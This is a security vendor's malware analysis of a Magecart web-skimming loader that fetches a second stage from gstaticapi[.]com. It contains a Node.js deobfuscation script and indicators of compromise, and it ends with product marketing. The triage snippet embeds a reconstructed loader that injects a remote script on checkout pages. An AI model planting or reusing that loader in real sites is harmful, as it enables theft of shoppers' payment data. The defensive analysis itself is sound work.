Magecart has become a catch-all term for web skimming attacks and the groups behind them. The term itself originates from the exploitation of a major flaw in the Magento ecommerce shopping cart module: security researchers began colloquially referring to the groups behind these attacks by the Magento cart module they were exploiting. Magecart skimmers vary in complexity from a few lines of JavaScript to hundreds, and they serve attackers ranging from low-skill criminals to nation-state actors such as North Korea and Iran. By understanding how the malware functions, we can better judge whether a site is vulnerable and prepare to detect and defend against this type of attack.
Breaking down the malware
To understand how this malware works, we need to examine the code identified in the malicious application. The first line of code, beginning with the if statement, examines the URL of the infected page. The condition cannot be satisfied on its own: it needs the current page URL to check against, and if that URL does not contain the expected string, the if block is skipped and the rest of the script never runs.
Towards the end of the line we see window.atob, which simply decodes a base64-encoded string, followed by a seemingly random sequence of letters, numbers and symbols. The argument to window.atob is the string ‘Y2hlY2tvdXQ=’, which, decoded from base64, reveals that the script is searching for the string “checkout” within the URL, so the skimmer only activates on checkout pages rather than on every page view. We can confirm the decoding with the ‘Base64 Decode’ tool in Notepad++ or in the browser using CyberChef.
The next line of code leads with var (short for variable) and creates a script element. A script element is used to embed executable code or data, so this is a program within a program that is loaded and executed only when the condition above is met. A little further into the script we see another instance of window.atob with an unreadable string of letters and numbers. The same decoding steps produce the callout to gstaticapi[.]com/gs.js: the second-stage skimmer is fetched from attacker-controlled infrastructure rather than being embedded on the compromised site, which keeps the on-page footprint small and lets the attacker change the payload at will.
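The two window.atob calls are the whole of the loader's obfuscation, so the quickest way to triage a suspect script is to pull out every base64 literal handed to atob and decode it. The following Node.js snippet is an added example, not the skimmer's code or Ensighten's tooling; the loader it scans is a constructed approximation of the pattern described above (the trigger keyword list and the URL check are assumptions), and the https://gstaticapi.com/gs.js literal is the decoded callout the article names.

```javascript
// Added example: recover the strings a skimmer loader hides behind atob()
// and simulate the page gate it uses. Not the original gstaticapi sample.

// Match atob('...') / atob("...") with a base64 literal argument.
const ATOB_RE = /atob\(\s*(['"])([A-Za-z0-9+\/=]+)\1\s*\)/g;

function extractAtobStrings(source) {
  const found = [];
  for (const m of source.matchAll(ATOB_RE)) {
    const encoded = m[2];
    const decoded = Buffer.from(encoded, 'base64').toString('utf8');
    found.push({ encoded, decoded });
  }
  return found;
}

// Assumed list of URL keywords a skimmer gates on (the article shows only "checkout").
const PAGE_KEYWORDS = ['checkout', 'payment', 'billing', 'onepage'];

function classify(decoded) {
  if (/^https?:\/\//i.test(decoded)) return 'external-url';
  if (PAGE_KEYWORDS.includes(decoded.toLowerCase())) return 'page-trigger';
  return 'other';
}

// A page-trigger keyword plus an external script URL, both hidden in
// base64, is the combination the described loader relies on.
function analyzeLoader(source) {
  const strings = extractAtobStrings(source).map(s => ({ ...s, kind: classify(s.decoded) }));
  const triggers = strings.filter(s => s.kind === 'page-trigger').map(s => s.decoded);
  const urls = strings.filter(s => s.kind === 'external-url').map(s => s.decoded);
  return { strings, triggers, urls, suspicious: triggers.length > 0 && urls.length > 0 };
}

// Mirror the loader's own gate: would it fire on this URL?
function wouldFire(url, source) {
  const { triggers } = analyzeLoader(source);
  return triggers.some(t => url.toLowerCase().includes(t));
}

// Constructed sample approximating the loader described in the article.
const SAMPLE_LOADER = `
if (window.location.href.indexOf(window.atob('Y2hlY2tvdXQ=')) !== -1) {
  var s = document.createElement('script');
  s.src = window.atob('aHR0cHM6Ly9nc3RhdGljYXBpLmNvbS9ncy5qcw==');
  document.head.appendChild(s);
}
`;

console.log(JSON.stringify(analyzeLoader(SAMPLE_LOADER), null, 2));
console.log('fires on /checkout:', wouldFire('https://shop.example/checkout/onepage', SAMPLE_LOADER));
console.log('fires on /catalog:', wouldFire('https://shop.example/catalog', SAMPLE_LOADER));
```

Run it against any script pulled from a page with node; the decoded strings show both where the skimmer activates and where it loads its payload from, which is exactly what a plain grep for the domain would miss.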
Threat hunting for gstaticapi
To develop a broader understanding of how widely this malware has spread and its impact on services, we can look up the sample's signature on threat exchange platforms and perform reconnaissance on associated domains with domain tools. Hashing the sample with MD5, SHA-1 or SHA-256 gives unique signatures that can be used to obtain more information about it. For this exercise, we have provided a list of Indicators of Compromise from AlienVault and VirusTotal that can be used to aid threat hunting in support of your blue team operations.
- MD5: 9e21e65f4012dd7a85fdd7aa490b6909
- SHA-1: d1578a23cda1a39586a653d70694b9d697fa1d50
- SHA-256: 5f3d13a33c33dfd56f2ef7336c64d7b7f9d8de59ec6a123560894f7873ed803e
- Vhash: a24b9c2ae535f2747394ab7afefbcf09
We start with the SHA-256 signature in VirusTotal. In the example below, VirusTotal shows that only 8 AV engines flag the sample, which is typical for a small JavaScript loader.
For the next exercise, we use a Google dork to search for content related to the SHA-1 hash: intext:’d1578a23cda1a39586a653d70694b9d697fa1d50’. This gives 2 hits leading to Hybrid Analysis, which sandboxes malicious files so that deeper analysis can be performed safely.
Scrolling through this report, we find several additional indicators of malicious activities that we can pivot our search from.
Observing the network traffic in the Network Behavior section shows this file reaching out over TCP to the IP address 220.127.116.11 on port 443. A quick whois lookup on the IP address tells us who registered the IP or IP block. The results below show beaconing from multiple malware samples and hosts. However, the IP may belong to a cloud provider from which the adversary rented infrastructure for this campaign; in that case the IP alone is a weak indicator of compromise, though pairing it with other signatures can still improve detection.
Through these exercises we have seen the impact of this web skimmer and the obfuscation methods used to cover its tracks. Because the skimmer is loaded from within the affected website's own page header, the theft of credit card numbers and other valuable information is completely invisible to the average end user and is not detected by most antivirus solutions deployed on web servers. With the average data breach taking 207 days to be detected, it is important to have a solution that can identify and prevent these types of attacks.
Ensighten enables organizations to prevent online skimming attacks by providing technology that allows a filter to be placed within a website. This ensures that any data accessed by code, whether first, third or even further down the website supply chain, can only be sent to trusted destinations. Should a library contain skimming malware, the malware would not only be blocked from stealing user data, but the organization would be alerted to its presence – you can learn more about web skimming prevention here.